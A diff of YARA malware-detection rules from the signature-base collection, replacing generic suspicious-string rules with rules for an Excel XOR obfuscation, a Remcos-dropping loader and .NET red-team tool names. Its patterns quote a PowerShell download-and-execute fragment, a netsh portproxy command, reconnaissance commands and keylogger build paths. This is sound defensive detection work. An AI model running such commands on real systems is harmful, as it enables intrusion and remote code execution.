+		hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9"
+		hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa"
 
 	strings:
-		$ = "tasklist"
-		$ = "net time"
-		$ = "systeminfo"
-		$ = "whoami"
-		$ = "nbtstat"
-		$ = "net start"
-		$ = "qprocess"
-		$ = "nslookup"
+		$s1 = "ebai.exe" fullword wide
+		$s2 = "Origina" fullword wide
 
 	condition:
-		filesize < 5KB and 4 of them
+		uint16( 0 ) == 0x5a4d and $s1 in ( 0 .. 30000 ) and $s2 in ( 0 .. 30000 )
 }
-rule SIGNATURE_BASE_VBS_Dropper_Script_Dec17_1 : FILE
+rule SIGNATURE_BASE_Gen_Excel_Xor_Obfuscation_Velvetsweatshop : FILE
 {
 	meta:
-		description = "Detects a supicious VBS script that drops an executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "60f23d32-0737-501f-bf1c-1ca32af62efc"
-		date = "2018-01-01"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L88-L107"
+		description = "Detects XOR encryption (c. 2003) in Excel file formats"
+		author = "@JohnLaTwc"
+		id = "8a16105c-4f43-5a35-941c-6ee9593b039c"
+		date = "2020-10-09"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/BouncyHat/status/1308896366782042113"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_excel_xor_obfuscation_velvetsweatshop.yar#L3-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f3c55bd6bf382891263887e46a794329c78bff87b7685088911261fc3b3b133d"
-		score = 80
+		logic_hash = "c38d56199d34adfc98d8032321239ab20c6eaa8abcafd56f8e1cf24fd3a4094f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "da1999c23ee2dae02a169fd2208b9766cb8f046a895f5f52bed45615eea94da0"
+		hash2 = "14a32b8a504db3775e793be59d7bd5b584ea732c3ca060b2398137efbfd18d5a"
+		hash3 = "dd3e89e7bde993f6f1b280f2bf933a5cc2797f4e8736aed4010aaf46e9854f23"
+		hash4 = "4e40253b382b20e273edf82362f1c89e916f7ab8d3c518818a76cb6127d4e7c2"
 
 	strings:
-		$s1 = "TVpTAQEAAAAEAA"
-		$s2 = "TVoAAAAAAAAAAA"
-		$s3 = "TVqAAAEAAAAEAB"
-		$s4 = "TVpQAAIAAAAEAA"
-		$s5 = "TVqQAAMAAAAEAA"
-		$a1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+		$olemarker = { D0 CF 11 E0 A1 B1 1A E1 00 00 00 }
+		$FilePass_XOR_Obfuscation_VelvetSweatshop = { 2F 00 06 00 00 00 59 B3 0A 9A }
 
 	condition:
-		filesize < 600KB and $a1 and 1 of ( $s* )
+		uint32( 0 ) == 0xe011cfd0 and filesize < 400KB and $olemarker at 0 and $FilePass_XOR_Obfuscation_VelvetSweatshop
 }
-rule SIGNATURE_BASE_SUSP_PDB_Strings_Keylogger_Backdoor : HIGHVOL FILE
+rule SIGNATURE_BASE_MAL_Coralwave_Lenovospkvol_Remcosmicdrop : FILE
 {
 	meta:
-		description = "Detects PDB strings used in backdoors or keyloggers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "190daadb-0de6-5665-a241-95c374dbda47"
-		date = "2018-03-23"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L109-L130"
+		description = "CoralWave loader masquerading as Lenovo audio DLL. Drops Remcos RAT."
+		author = "xstp"
+		id = "8d9c826f-135d-5a90-b8f6-33d235dff7e6"
+		date = "2026-01-01"
+		modified = "2026-01-02"
+		reference = "https://bazaar.abuse.ch/sample/050edadedd7947bc6418f7856a29df5b7b5550bf5eec7f5f37e9a7e1713036f6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_coralwave_remcos_dropper.yar#L1-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a842ff8cd8be98a2e37a81706a9c594e8bf1bcc6bd3cedfe4747cd52f6044f5"
-		score = 65
+		hash = "65302b435a5bc30e8f0215455679635ec50b5b1caba9e55f9258d17c7238be54"
+		logic_hash = "ec6303584d65cf2138ca44a1cf5e958586d9eee2e9e17a90d0942b1ebee3d01f"
+		score = 85
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$ = "\\Release\\PrivilegeEscalation"
-		$ = "\\Release\\KeyLogger"
-		$ = "\\Debug\\PrivilegeEscalation"
-		$ = "\\Debug\\KeyLogger"
-		$ = "Backdoor\\KeyLogger_"
-		$ = "\\ShellCode\\Debug\\"
-		$ = "\\ShellCode\\Release\\"
-		$ = "\\New Backdoor"
+		$stub_1 = "BAyXuHpAGwdG8ebXF3GvZ32vO3ORY" ascii
+		$stub_2 = "IK5HT1XPlj3LoFkKi3YC4QwYQs7s" ascii
+		$stub_3 = "Xmk61GHDjDfjUjJhNjwDPXxM1Cdg" ascii
+		$fake_1 = "GetVolumeLevel" ascii
+		$fake_2 = "OpenSpeakerVolumeInterface" ascii
+		$fake_3 = "SetMuteState" ascii
+		$mutex = "Rmc-245S33" wide ascii
+		$log_file = "logs.dat" wide ascii
+		$audio_folder = "MicRecords" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		filesize < 5MB and uint16( 0 ) == 0x5A4D and ( 2 of ( $stub_* ) or ( 2 of ( $fake_* ) and 1 of ( $mutex , $log_file , $audio_folder ) ) )
 }
-rule SIGNATURE_BASE_SUSP_Microsoft_Copyright_String_Anomaly_2 : FILE
+rule SIGNATURE_BASE_Typical_Malware_String_Transforms : FILE
 {
 	meta:
-		description = "Detects Floxif Malware"
+		description = "Detects typical strings in a reversed or otherwise modified form"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3257aff0-b923-5e56-b67c-fa676341a102"
-		date = "2018-05-11"
-		modified = "2025-03-21"
+		id = "86f348b5-0564-5d83-bbea-4f4a5f62fd30"
+		date = "2016-07-31"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L132-L146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_transformed_strings.yar#L10-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "60bc5d8d0853f474b81d2274a65977a12a481e4b669b38ae47a325eeb60d2735"
+		logic_hash = "1d3813e0d20b82ceda56d03589bb944f747dfe931396ed514fb6b36f72f98c26"
 		score = 60
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
 
 	strings:
-		$s1 = "Microsoft(C) Windows(C) Operating System" fullword wide
+		$e1 = "exe.tsohcvs" fullword ascii
+		$e2 = "exe.ssasl" fullword ascii
+		$e3 = "exe.rerolpxe" fullword ascii
+		$e4 = "exe.erolpxei" fullword ascii
+		$e5 = "exe.23lldnur" fullword ascii
+		$e6 = "exe.dmc" fullword ascii
+		$e7 = "exe.llikksat" fullword ascii
+		$l1 = "lld.23lenreK" fullword ascii
+		$l2 = "lld.ESABLENREK" fullword ascii
+		$l3 = "lld.esabtpyrc" fullword ascii
+		$l4 = "lld.trcvsm" fullword ascii
+		$l5 = "LLD.LLDTN" fullword ascii
+		$i1 = "paeHssecorPteG" fullword ascii
+		$i2 = "sserddAcorPteG" fullword ascii
+		$i3 = "AyrarbiLdaoL" fullword ascii
+		$i4 = "AssecorPetaerC" fullword ascii
+		$r1 = "teSlortnoCtnerruC" fullword ascii
+		$r2 = "nuR\\noisreVtnerruC" fullword ascii
+		$f1 = "\\23metsys\\" ascii
+		$f2 = "\\23metsyS\\" ascii
+		$f3 = "niB.elcyceR$" fullword ascii
+		$f4 = "%tooRmetsyS%" fullword ascii
+		$fp1 = "Application Impact Telemetry Static Analyzer" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and 1 of them and not 1 of ( $fp* ) )
 }
-rule SIGNATURE_BASE_SUSP_LNK_File_Appdata_Roaming : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Fakefilemaker : FILE
 {
 	meta:
-		description = "Detects a suspicious link file that references to AppData Roaming"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d905e58f-ae2e-5dc2-b206-d0435b023df0"
-		date = "2018-05-16"
-		modified = "2025-03-21"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L148-L168"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "2c87114f-5295-583f-b567-623d478ce0eb"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/FakeFileMaker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L3-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e5c78d3fe3fcdbfb097f833fbb1e15ad1f79e63b330eaba754d8b5296b5165a"
-		score = 50
+		logic_hash = "27d402835f31b6383c837e90248ae5c6d22f4c267d52625ebfbcc2ee5099ccad"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "AppData" fullword wide
-		$s3 = "Roaming" fullword wide
-		$s4 = { 00 2E 00 65 00 78 00 65 00 2E 00 43 00 3A 00 5C
-              00 55 00 73 00 65 00 72 00 73 00 5C }
+		$name = "FakeFileMaker" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_File_Pathtraversal : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Wmipersistence : FILE
 {
 	meta:
-		description = "Detects a suspicious link file that references a file multiple folders lower than the link itself"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f4f6709f-9c4d-5f0c-9826-97444d282adc"
-		date = "2018-05-16"
-		modified = "2025-03-21"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L170-L186"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "7a674596-c697-569d-a16c-3cefe4ff752a"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/mdsecactivebreach/WMIPersistence"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L18-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9935c454518abe7fd4ec4f09e36e4200ec7c9f3b3ad004e9b49d60c08f508236"
-		score = 40
+		logic_hash = "f8f5e1b6d9b9e8e2f76a7e02385142bbeb755d1b1e41e501f4f74fcaba0a7dad"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "..\\..\\..\\..\\..\\"
+		$name = "WMIPersistence" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Script_Obfuscation_Char_Concat
+rule SIGNATURE_BASE_HKTL_NET_Adcollector_Sep22_1 : FILE
 {
 	meta:
-		description = "Detects strings found in sample from CN group repo leak in October 2018"
+		description = "Detects ADCollector Tool - a lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d3bfdfd-ef8f-5740-ac1f-5835c7ce0f43"
-		date = "2018-10-04"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L188-L200"
+		id = "48b376e4-752b-523e-b34e-65b6944c33fb"
+		date = "2022-09-15"
+		modified = "2024-12-10"
+		reference = "https://github.com/dev-2null/ADCollector"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L55-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "28b648e0e1c22fefa49a937f40bd4ed09c5d3894ff059979bad69e8bc98fcac2"
-		score = 65
+		logic_hash = "66d5363e885378c442e7532f69d4c36618d7a0f5dbe67490631d1ed5078d3fba"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b"
+		tags = "FILE"
+		hash1 = "241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338"
+		hash2 = "cc086eb7316e68661e3d547b414890d5029c5cc460134d8b628f4b0be7f27fb3"
 
 	strings:
-		$s1 = "\"c\" & \"r\" & \"i\" & \"p\" & \"t\"" ascii
+		$x1 = "ADCollector.exe --SPNs --Term key --Acls 'CN=Domain Admins,CN=Users,DC=lab,DC=local'" wide fullword
+		$s1 = "ADCollector.exe" wide fullword
+		$s2 = "ENCRYPTED_TEXT_PASSWORD_ALLOWED" ascii fullword
+		$s3 = "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf" wide
+		$s4 = "[-] Password Does Not Expire Accounts:" wide
+		$s5 = "  * runAs:       {0}" wide fullword
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_Powershell_IEX_Download_Combo
+rule SIGNATURE_BASE_HKTL_NET_NAME_Maliciousclickoncegenerator : FILE
 {
 	meta:
-		description = "Detects strings found in sample from CN group repo leak in October 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1dfedcb0-345c-548c-85ac-3c1e78bfd9e2"
-		date = "2018-10-04"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L202-L218"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "683af3b4-4c91-5ff3-96bf-d5c1d9c19cc2"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L77-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a1507859354e0e0d9284befcf777c4d3883496eb96524a246a1df4f3a247aa9"
-		score = 65
+		logic_hash = "91e5878d49ad9af5420d4e29afaa600337fb8051951598a997cd74d72c884206"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "IEX ((new-object net.webclient).download" ascii nocase
-		$fp1 = "chocolatey.org"
-		$fp2 = "Remote Desktop in the Appveyor"
-		$fp3 = "/appveyor/" ascii
+		$name = "MaliciousClickOnceGenerator" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$x1 and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Win32Dll_String : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Directinjectorpoc : FILE
 {
 	meta:
-		description = "Detects suspicious string in executables"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b1c78386-c23d-5138-942a-3da90e5802cc"
-		date = "2018-10-24"
-		modified = "2025-03-21"
-		reference = "https://medium.com/@Sebdraven/apt-sidewinder-changes-theirs-ttps-to-install-their-backdoor-f92604a2739"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L220-L232"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d9a430d7-b062-554b-aff4-cfd98d91e9fe"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/badBounty/directInjectorPOC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L92-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "514596e078483920cedf0091cd769d8462acfd39956c3ed3e12d630b02ebb7cc"
-		score = 65
+		logic_hash = "ffdc5694668af6c82b493403373d2e2e915e45bca8d58ec1ab41c5a8bd28d781"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7bd7cec82ee98feed5872325c2f8fd9f0ea3a2f6cd0cd32bcbe27dbbfd0d7da1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "win32dll.dll" fullword ascii
+		$name = "directInjectorPOC" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 60KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Modified_Systemexefilename_In_File : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Asstrongasfuck : FILE
 {
 	meta:
-		description = "Detecst a variant of a system file name often used by attackers to cloak their activity"
-		author = "Florian Roth (Nextron Systems)"
-		id = "97d91e1b-49b8-504e-9e9c-6cfb7c2afe41"
-		date = "2018-12-11"
-		modified = "2025-03-21"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L234-L248"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "4c63c8a2-5889-5177-9f66-8e5f755025a3"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Charterino/AsStrongAsFuck"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L107-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "45c01024c4e6a3563cd27d8a78e2236d49aa795d24f322774a14b4c7289830c4"
-		score = 65
+		logic_hash = "4765f2099bf8fa8ebccd8cdcc561354f4aeba28c2473fd8556f1ef1d5d28dadd"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a"
-		hash2 = "f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "svchosts.exe" fullword wide
+		$name = "AsStrongAsFuck" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_JAVA_Class_With_VBS_Content : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Magentoscanner : FILE
 {
 	meta:
-		description = "Detects a JAVA class file with strings known from VBS files"
-		author = "Florian Roth"
-		id = "472cbeaf-28e7-51a2-b2e6-96c1d9d05b26"
-		date = "2019-01-03"
-		modified = "2025-03-20"
-		reference = "https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L250-L275"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "db3912bd-574c-57e2-a9b6-4b440d144471"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/soufianetahiri/MagentoScanner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L122-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf325bbb6a448f977e4e661e4296c4145de9a809c79cee8538d660ecaff76e94"
-		score = 70
-		quality = 83
+		logic_hash = "245dce3be07c8e84dfcd2cdb2d9f24406a9b11b437e74969f1472a6ee149fd9c"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "e0112efb63f2b2ac3706109a233963c19750b4df0058cc5b9d3fa1f1280071eb"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "java/lang/String" ascii
-		$s1 = ".vbs" ascii
-		$s2 = "createNewFile" fullword ascii
-		$s3 = "wscript" fullword ascii nocase
-		$fp1 = "com/smm/"
-		$fp2 = "install"
+		$name = "MagentoScanner" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 100KB and $a1 and all of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_RAR_With_PDF_Script_Obfuscation : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Revengerat_Stub_Cssharp : FILE
 {
 	meta:
-		description = "Detects RAR file with suspicious .pdf extension prefix to trick users"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a3d2f5e9-3052-551b-8b2c-abcdd1ac2e48"
-		date = "2019-04-06"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L277-L293"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "06dce4f9-4d7a-5976-a87a-07c539e5dbe8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/NYAN-x-CAT/RevengeRAT-Stub-CSsharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L137-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05e9fd7620a70a490548d4562c80497bcf888e493b8e1188e0a0e0c274e2a7e5"
-		score = 65
+		logic_hash = "a3bd1f8e52e6ed468b6a4fea83456ca813b69e2d676dfab687bbea5a746fed3c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "b629b46b009a1c2306178e289ad0a3d9689d4b45c3d16804599f23c90c6bca5b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".pdf.vbe" ascii
-		$s2 = ".pdf.vbs" ascii
-		$s3 = ".pdf.ps1" ascii
-		$s4 = ".pdf.bat" ascii
-		$s5 = ".pdf.exe" ascii
+		$name = "RevengeRAT-Stub-CSsharp" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x21726152 and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Netsh_Portproxy_Command
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpyshell : FILE
 {
 	meta:
-		description = "Detects a suspicious command line with netsh and the portproxy command"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cbbd2042-572c-5283-bd45-e745b36733ad"
-		date = "2019-04-20"
-		modified = "2025-03-21"
-		reference = "https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L295-L308"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "3069c5eb-446e-5bfa-9df0-2e03f229d4d1"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/antonioCoco/SharPyShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L152-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dbf82a908e77886af1c31c51f5f6684015cbcb22bf28876c2e1b0dd1ea5bd2b4"
-		score = 65
+		logic_hash = "89d0010c08349f8982c7f5aa5f7855702556ce10f9f3b5b18b61349c5233e001"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "netsh interface portproxy add v4tov4 listenport=" ascii
+		$name = "SharPyShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Dropperbackdoor_Keywords : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostloader : FILE
 {
 	meta:
-		description = "Detects suspicious keywords that indicate a backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2942ba6d-a533-5954-bfcf-417262e2fac2"
-		date = "2019-04-24"
-		modified = "2025-03-21"
-		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L310-L322"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d8d88f3f-f250-55ff-88a6-4623e12ef89d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/TheWover/GhostLoader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L167-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e83fa95bb2b9ac821d0a00af23834495066ad2cad38ef4f4dcc81aee75415d74"
-		score = 65
+		logic_hash = "91527b4b35f2bb1aeee236647c5169c67f2b9cfb867f2b6d486bd8d8b7455d4b"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
